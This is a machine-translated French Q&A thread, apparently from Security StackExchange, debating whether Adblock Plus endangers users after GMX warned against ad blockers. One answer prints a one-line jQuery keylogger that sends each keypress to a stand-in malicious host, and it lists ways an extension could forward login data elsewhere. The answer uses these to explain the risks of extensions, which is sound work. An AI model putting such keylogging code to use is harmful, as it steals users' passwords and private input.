Question:
Adblock (Plus) est-il un risque de sécurité?
Tobias Kienzler
2014-02-27 13:25:32 UTC
view on stackexchange narkive permalink

Le site Web de mon fournisseur de messagerie ( http://www.gmx.de ) a récemment commencé à créer un lien vers le site (allemand) http://www.browsersicherheit.info/ qui prétend essentiellement qu'en raison de ses capacités à modifier l'apparence d'un site, Adblock Plus (et d'autres) pourrait en fait être abusé pour du phising. Voici une citation de ce site et sa traduction:

Solche Add-ons haben Zugriff auf alle Ihre Eingaben im Browser und können diese auch an Dritte weitergeben - auch Ihr Bank-Passwort. Dies kann auf allen Web-Seiten passieren. Sicherheitsmechanismen wie SSL können das nicht verhindern.

traduit:

Ces addons peuvent accéder à toutes les entrées de votre navigateur et peuvent également les transmettre à des tiers - même votre mot de passe bancaire. Cela peut arriver sur tous les sites Web. Les mécanismes de sécurité tels que SSL ne peuvent pas éviter cela.

Ok, ils mentionnent d'autres addons (assez évidemment crapware), mais Adblock Plus est-il vraiment une menace pour la sécurité ou les opérateurs de ce site utilisent-ils simplement essayez de faire peur aux utilisateurs inexpérimentés pour qu'ils revoient leurs annonces?

Cela se résume à: N'exécutez aucune application en laquelle vous n'avez pas confiance. Si Adblock était maléfique, il pourrait voler vos données de connexion. Si un autre exécutable que vous exécutez était mauvais, il pourrait le faire également.
Juste pour l'humour: pourquoi n'utilisez-vous pas Ghostery? ;-)
Pouvez-vous clarifier la question? Vous demandez-vous si des modules complémentaires comme Adblock pourraient _théoriquement_ être un risque de sécurité, ou demandez-vous si Adblock est _actuellement_ un risque de sécurité?
@MooingDuck Bon point - je pose une question sur _actuellement_, puisque théoriquement cela devrait être clairement possible, non?
Je me demande combien d'utilisateurs ont commencé à utiliser Adblock Plus après avoir lu tous les articles à ce sujet? Certaines entités devraient vraiment considérer l '[effet Streisand] (http://en.wikipedia.org/wiki/Streisand_effect) avant de lancer une campagne de chantage.
** Mise à jour: ** Les administrateurs du site FUD (ou Adblock lui-même :) ont quant à eux supprimé les adblockers de la liste des "bad-ons" (oh là là, cette création de mots à elle seule me fait penser aux films B). De plus, Adblock m'a maintenant offert la possibilité de masquer les bannières FUD sur la page d'accueil de GMX. Je suppose que ce n'est pas exactement l'effet qu'ils espéraient ...
Pour être honnête, il y a eu un grand nombre de clones de logiciels malveillants dans la boutique en ligne Chrome. J'en ai signalé quelques-uns auparavant et les ai finalement supprimés, mais j'ai abandonné maintenant. Certains sont allés jusqu'à copier les descriptions et les icônes exactes des extensions de bloc d'annonces légitimes pour obtenir des hits. Vous ne pouviez pas faire la différence entre «Adblock» et «Adb1ock». Ensuite, avec toutes les fausses évaluations 5 étoiles ... il est difficile de dire ce qui est réellement légitime. Il suffit de regarder toutes les extensions "Adblock for XXX" qui prétendent fonctionner et tous les commentaires indiquant le contraire. Soyez juste intelligent sur ce que vous téléchargez des gens.
@JeffMercado N'est-ce pas alors un problème sérieux avec la boutique en ligne de Chrome? Je ne me souviens pas qu'une telle BS se soit produite à Mozilla ...
C'est définitivement le cas. Je dis simplement que les gens peuvent être induits en erreur en pensant que ces clones proviennent des fabricants des versions légitimes des blocs publicitaires. Ils pourraient penser que le clone adblock était une arnaque, donc tous les adblock (clone ou non) sont des arnaques. Il est possible que quelqu'un chez GMX ait été brûlé par cela et sans vraiment faire de recherche, poussé pour cette campagne.
C'est après tout un logiciel open source qui devrait tuer ce problème une fois pour toutes.
Inversement, Adblock est une forme de sécurité. Avant de l'installer sur Android, j'ai été bombardé de publicités m'incitant à installer l'application d'un annonceur.
@TheRookierLearner pourriez-vous développer Ghostery, s'il vous plaît?
@Federico Fondamentalement, il montre et vous permet de bloquer tout suivi, ajout et harcèlement de parties de sites Web: https://www.ghostery.com/
Tobias, je sais et je l'utilise, je me demandais parce que la question d'@TheRookierLearner semblait sarcastique et je ne pouvais pas comprendre.
@Federico Je pense que leur but était de suggérer par moquerie d'utiliser un autre addon pour vérifier à quel point adblock est digne de confiance, ce qui ne fait que déléguer la confiance de l'adblock à ghostery ...
@Federico - Oui, je suggère en effet un autre add-on. Sur une note différente (à propos du fait qu'il existe plusieurs modules complémentaires), si vous recherchez "adblock" sur le Google Web Store d'extensions, vous obtiendrez de nombreux résultats tels que "adblock pro", "adblock premium", "adblock plus" (et la liste est longue) et vous ne savez pas laquelle est la plus légitime. Recherchez "ghostery" d'autre part, vous n'obtenez qu'une seule extension. Je ne suis pas fan de ghostery mais pour une raison quelconque, il ne semble pas avoir plusieurs extensions de copie (et n'ajoute pas à la confusion qui crée "adblock")
Par souci de réponse, je suis juste allé sur le site Web de Ghostery et j'ai trouvé ceci: `` De plus, son site Web indique clairement: `Ghostery ne collecte aucune donnée par défaut. Vous pouvez choisir de nous envoyer des données en activant la fonction Ghostrank. `(plus dans leur déclaration de confidentialité, CLUF et FAQ). Encore une fois, je veux juste affirmer que je ne suis pas fan ou promoteur de Ghostrey (en fait, cela casse parfois certaines pages et ne bloque pas les publicités sur YouTube) mais il n'y a pas de confusion (ou d'autres conneries comme "accéder user input ") comme c'est le cas avec d'autres bloqueurs de publicités.
J'ai juste pensé qu'il était important de partager ça. Après avoir utilisé adblock plus, j'ai eu des problèmes de logiciels malveillants. J'avais adblock installé sur mon Android. J'ai mon téléphone depuis plus d'un an sans aucun problème. Après avoir utilisé adblock, je recevais une fenêtre contextuelle sur le site adcasch à chaque fois que je déverrouillais mon écran. C'était très suspect car il apparaît dans le navigateur par défaut de mon téléphone que je n'utilise jamais. J'utilise uniquement un Chrome installé par un tiers. J'ai un antivirus sur mon téléphone. Il a scanné et n'a trouvé aucune menace. Je soupçonnais un blocage d'annonces car c'était la dernière application téléchargée qui donnait autant d'autorisations à l'application. J'ai désactivé l'application dans mon
Au mieux, ce sont des preuves anecdotiques. Etes-vous sûr d'avoir installé le vrai AdblockPlus depuis adblockplus.org? Ce n'est pas vraiment une réponse (encore).
Juste partage: j'ai arrêté d'utiliser Adblock Plus car il consommait trop de ressources sur mon ordinateur à l'époque.Maintenant, j'utilise toujours mon [VPN personnalisé] (https://github.com/hwdsl2/setup-ipsec-vpn), donc j'en ai fait également un serveur DNS, et j'ai résolu [les hôtes connus de publicité et de suivi] (https://github.com/StevenBlack/hosts/blob/master/hosts) à `0.0.0.0`.Problème résolu: annonces et suivi discrètement désactivés au niveau du réseau sur tous mes appareils configurés pour utiliser ce VPN.
Neuf réponses:
#1
+224
Andalur
2014-02-27 15:57:50 UTC
view on stackexchange narkive permalink

Ce n'est pas le cas. Il s'agit d'une campagne FUD ( peur, incertitude et doute) de GMX, car ils souhaitent afficher leurs annonces. Il n'y a absolument aucun risque de sécurité lié aux bloqueurs de publicités mentionnés. Ils ont ajouté du crapware à la liste pour la rendre plus légitime.

Bien sûr, de telles campagnes sont très inhabituelles, en particulier de la part d'une entreprise aussi grande et bien connue que GMX. Malheureusement, je n'ai pas de source anglaise à portée de main (car il s'agit d'une campagne uniquement en allemand) mais comme vous parlez allemand, vous voudrez peut-être lire cet article sur heise.de.

Update # 1: United Internet, la société derrière GMX, a reçu de nombreuses critiques pour avoir induit en erreur les clients en affirmant à tort qu'il existe un risque de sécurité sur leur PC. Le Wall Street Journal (édition allemande) a nommé les avertissements affichés sur GMX et le site auquel ils renvoient vers une "campagne de peur".

Mise à jour n ° 2: GMX dit maintenant qu'ils le feront ne plus afficher le lien lorsque vous utilisez des bloqueurs de publicité, mais l'affichera toujours si vous utilisez un crapware qui injecte des publicités, la liste sur le site http://www.browsersicherheit.info/ a été mise à jour en conséquence et liste maintenant seulement une petite collection de crapware. Cette liste n'est en aucun cas complète, ce n'est donc pas une source fiable lorsque vous voulez savoir si votre navigateur a installé crapware. Cependant, United Internet maintient sa position selon laquelle ils ne veulent pas que les utilisateurs qui visitent leurs sites utilisent des bloqueurs de publicités et ont déclaré qu'ils développeraient d'autres méthodes anti-blocage à l'avenir ( source allemande).

Merci pour le lien, cela se résume essentiellement à votre réponse et continue en expliquant que cette campagne n'est pas surprenante après [l'annonce de poursuivre Eyeo en raison de leur fonctionnalité "Accepable Adds" (lien en allemand également)] (http: / /www.heise.de/newsticker/meldung/Acceptable-Ads-Werber-wollen-offenbar-Adblock-Plus-verklagen-2104273.html) - apparemment le FUD est basé sur [un incident Chrome] (http: // arstechnica. com / security / 2014/01 / malware-vendeurs-buy-chrome-extensions-to-send-adware-filled-updates /)
À qui avez-vous le plus confiance? ABP (qui fait l'objet d'un examen constant et serait roulé à la vapeur s'il remplaçait mybank.com par autre chose) ou une société allemande aléatoire? Un addon pourrait-il être utilisé à des fins malveillantes? Bien sûr ... mais sans preuve, ce ne sont que des accusations aveugles et des FUD.
@WernerCD GMX est un important fournisseur de messagerie, l'un des principaux fournisseurs non-gmail. Ce n'est pas "une société allemande aléatoire". Et, de tous les pays, une entreprise * allemande * est celle dont vous décidez de vous méfier?
@Superbest GMX et d'autres fournisseurs de messagerie allemands lancent également la campagne «E-Mail made in Germany», dans laquelle ils induisent les clients en erreur en leur faisant croire que les e-mails envoyés sur leurs serveurs de messagerie sont à l'abri de la surveillance.
@Superbest Eh bien ... si ce n'est pas une société américaine, alors c'est une autre société aléatoire. .. ... Je plaisante, je plaisante. Mais sérieusement, je dirais la même chose pour la plupart des entreprises - et je dirais la même chose si Comcast ou Google me disaient d'arrêter d'utiliser ABP. Vous devez lever un sourcil lorsqu'une entreprise qui profite des publicités vous dit de cesser d'utiliser un bloqueur de publicités.
C'est vraiment malhonnête de dire qu'il n'y a *** aucun risque ***. Cependant, [les risques sont assez petits] (http://security.stackexchange.com/a/52411/4906) que je conviens que ce n'est rien de plus qu'une campagne FUD.
La société derrière AdblockPlus (Eyeo) est assez douteuse [1], donc avertir les utilisateurs en général pourrait être raisonnable. Néanmoins, des addons comme Adblock Edge [2] qui utilisent (pour autant que je sache) uniquement du code open source basé sur l'Ablock original semblent être plus sûrs. Donc, en regardant la conception du message d'avertissement, je conviens également qu'il s'agit principalement d'une campagne FUD guillerette destinée à augmenter à nouveau leurs revenus publicitaires. [1] http://www.mobilegeeks.de/adblock-plus-adblockgate-eyo-gmbh/[2] https://addons.mozilla.org/de/firefox/addon/adblock-edge/
@Superbest "_Ce n'est pas" une société allemande aléatoire "._" Mais ADB est connue dans le monde entier (comme Google). Un scandale impliquant la BAD serait une excellente nouvelle pour le monde.
Une campagne FUD de cette ampleur peut être "inhabituelle", mais les sites qui disent tout et tout ce qu'ils peuvent pour faire afficher leurs publicités ne sont guère un phénomène récent. Certains petits sites indépendants détectent le blocage des publicités et vous demandent poliment de le désactiver sur leur site car ils dépendent des revenus publicitaires. Et puis il y a les principaux sites d'entreprise comme www.denverbroncos.com, qui affiche une bannière affirmant "Nous avons remarqué que vous avez peut-être activé un bloqueur de publicités. Veuillez noter que notre site est mieux utilisé lorsque les bloqueurs de publicités sont désactivés." sans jamais justifier cette affirmation douteuse. "Meilleur" pour QUI?
FUD peut être vrai! C'est vraiment un risque. Les logiciels tiers peuvent faire beaucoup sinon tout (peut-être par le biais d'un piratage auquel vous vous exposez) sur votre ordinateur. Un petit risque vu ce qui se passe. Et parce que c'est un si petit risque, c'est FUD. Mais FUD peut être vrai.
#2
+111
Code Whisperer
2014-02-27 22:14:58 UTC
view on stackexchange narkive permalink

Update↑

Après y avoir réfléchi, je suis d'accord avec les autres réponses en ce que, malgré le fait qu'il PEUT accéder à vos données, Adblock est plus susceptibles de protéger votre vie privée plutôt que de l’envahir. Le risque réel réside dans les publicités malveillantes qui vous invitent à installer un logiciel sur votre ordinateur. Adblock les empêche.

Voici la réponse originale, mise en garde:

Oui, tout à fait.

Adblock Plus est un extension / module complémentaire de navigateur développé par un développeur indépendant. Adblock peut accéder au DOM (modèle d'objet de document) sur toutes les pages.

Le fonctionnement d'AdBlock est qu'il injecte un script dans votre navigateur, qui recherche le DOM, puis exécute un hide () sur ce qu'il détermine sont des publicités.

Cela signifie qu'AdBlock (et toute extension Chrome avec cette autorisation) peut accéder à votre DOM. Adblock ne peut pas accéder aux variables JavaScript.

Qu'est-ce que cela signifie?

Si vous êtes sur un site Web avec une authentification sécurisée, et qu'il y a un objet JavaScript avec quelque chose de privé comme une AuthKey, vous êtes sûr . AdBlock ne peut pas accéder aux variables JavaScript.

Cependant, AdBlock PEUT exécuter un code équivalent à celui-ci.

$ (window) .onKeyPress (function (e) {$ ('html' ) .append ('<img src =' http: //mymalicioussite.com/stealData/keyPress.png? key = '+ e.keyCode)})

Ce qui acheminera essentiellement toutes les clés vous appuyez sur un serveur distant.

Cela peut être utilisé pour voler votre mot de passe, ce qui est encore pire que de voler votre jeton.

Cela étant dit, AdBlock est-il dangereux?

Il me semble qu'AdBlock n'est pas trop dangereux car le développeur s'est identifié et il est utilisé par des millions de personnes. Si cela faisait le genre de ruse comme ci-dessus, quelqu'un aurait probablement remarqué et sifflé.

Mais ne pensez pas que les extensions Chrome sont totalement sûres. Tous peuvent voler toutes les données, ainsi que d'autres choses malveillantes.

Que peut-il faire d'autre?

Une extension Chrome peut également effectuer les violations de sécurité suivantes de manière assez triviale ...

  • Acheminer le contenu de tout e-mail ou page que vous lisez vers une source tierce (si cet e-mail contient des Si vous pouvez le voir à l'écran, ainsi que toute extension Chrome, aucune question posée.
  • Entrez les informations dans un champ et appuyez sur le bouton d'envoi, par exemple, envoyez un e -mail
  • Si vous laissez votre navigateur ouvert, et que l'extension sait comment faire, elle peut utiliser votre interface de messagerie (Gmail, Outlook) pour envoyer les e-mails de son choix à vos contacts. C'est trivial.
  • Changez le script associé à n'importe quel bouton, s'il a été mis à l'origine avec jQuery. Par exemple, le bouton qui envoie vos informations de connexion au serveur peut être légèrement modifié pour envoyer ces informations à la fois au serveur et à http: // mymaliciousserver . C'est trivial.

Mise à jour

Il a été vérifié par la discussion qu'AdBlock est open source. Cela devrait vous permettre de faire plus confiance à AdBlock, mais n'oubliez pas qu'il est toujours capable de faire ces choses. J'ai examiné la source et je peux affirmer en toute sécurité que je n'ai aucune idée de ce qui se passe.

Source: Je suis un développeur JavaScript et d'extensions Chrome.

Il ne s'agit que d'un seul bloqueur de publicités ... Il existe de nombreux bloqueurs de publicités différents dans la liste, et ils utilisent de nombreuses méthodes de blocage, je pense ...
S'il s'agit d'une extension Chrome et que vous lui permettez d'accéder à vos données sur toutes les pages, il peut faire toutes ces choses. Presque toutes les extensions Chrome demandent cette autorisation, et avec AdBlocker, elle est même nécessaire pour fonctionner, si vous y réfléchissez.
AdBlock Plus n'était-il pas open source? (;
Lien @FranciscoPresencia s'il vous plaît?
AiligvsuzrCMT//adblockplus.org/en/contribute-code
Excellente réponse sur le _potentiel_ des addons, bien qu'un titre légèrement trop effrayant à mon humble avis (j'utilise Firefox btw, mais je suppose que presque la même chose s'applique là-bas)
Votez à la fois pour une bonne réponse (qu'une application le fasse ou non, c'est l'échange de pile de sécurité de l'information et de telles questions méritent des réponses détaillées) et pour le nom ... qu'y avait-il dans la boîte?
Le lien a déjà été posté par @TobiasKienzler. De plus, un indice était le grand panneau vert dans la [page principale] (https://adblockplus.org/) qui disait * Open Source *.
@TobiasKienzer C'est génial. Excusez-moi pendant que je lance AdBlock et commence mon projet d'AdTeese, qui remplace chaque ajout par une pin-up de taille Dita von Teese.
"open-source" ne signifie rien si la source que vous regardez n'est pas la même source que celle utilisée par l'extension. J'ai publié le [visualiseur de source d'extension Chrome] (https://chrome.google.com/webstore/detail/chrome-extension-source-v/jifpbeccnghkjeaalbbjmodiffmgedin/reviews) qui permet de voir la source réelle d'une extension (= celui qui sera utilisé lors de l'installation d'une extension). Bien sûr, vous devez être sûr que l'extension fait ce qu'elle promet, c'est-à-dire afficher le code source correct au lieu d'un code censuré. Tout se résume à "n'installer que les logiciels des éditeurs en qui vous avez confiance").
@itcouldevenbeaboat S'il vous plaît faites, je l'utiliserais :-)
@TobiasKienzler Il semble que [Firefox a un processus d'examen plus strict] (http://arstechnica.com/business/2014/01/seeking-higher-ground-after-chrome-extension-adwaremalware-problems/) qui semble avoir un [ une plus grande concentration sur les révisions manuelles] (https://wiki.mozilla.org/AMO:Editors/EditorGuide/AddonReviews). Bien sûr, ce n'est pas infaillible (et vient avec des temps de mise à jour plus longs en attendant l'approbation), mais cela pourrait être plus que Chrome - Google n'est pas très explicite sur la façon dont ils examinent.
Il n'y a pas de "* objet JavaScript avec quelque chose de privé *" - à moins qu'il ne soit inutile. Même si un plugin n'accède pas aux variables locales, une fois qu'il a accès à la page (DOM, injection de script), il peut compromettre tout ce qui se passe avec JS, car toutes les interfaces d'effets secondaires sont publiques.
C'est une excellente citation qui pourrait s'appliquer à la plupart des logiciels: "J'ai examiné la source et je peux affirmer en toute sécurité que je n'ai aucune idée de ce qui se passe."
@Bergi En fait, les extensions Google Chrome s'exécutent dans un bac à sable VM et ne peuvent pas accéder aux variables JavaScript sur la page par aucun moyen que je connaisse.
@itcouldevenbeaboat une extension peut utiliser un script de contenu pour injecter un élément de script dans le dom, qui s'exécutera dans le contexte javascript de la page Web.
@itcouldevenbeaboat [Les scripts de contenu] (https://developer.chrome.com/extensions/content_scripts) ne sont * pas * exécutés dans une machine virtuelle. Les contextes d'exécution JavaScript sont en effet séparés, mais le DOM est partagé. Par conséquent, les scripts de contenu peuvent exécuter du code dans le contexte de la page Web en insérant des balises de script, en exécutant des gestionnaires d'événements, etc.
@RobW C'est intéressant. Pouvez-vous décrire un moyen d'accéder à une variable de fenêtre sur une page, par exemple, `maVariable`, à partir d'une extension Chrome, et je vais la vérifier?
@itcouldevenbeaboat Consultez les réponses et les réponses liées sur http://stackoverflow.com/q/9515704
Peut-il insérer des balises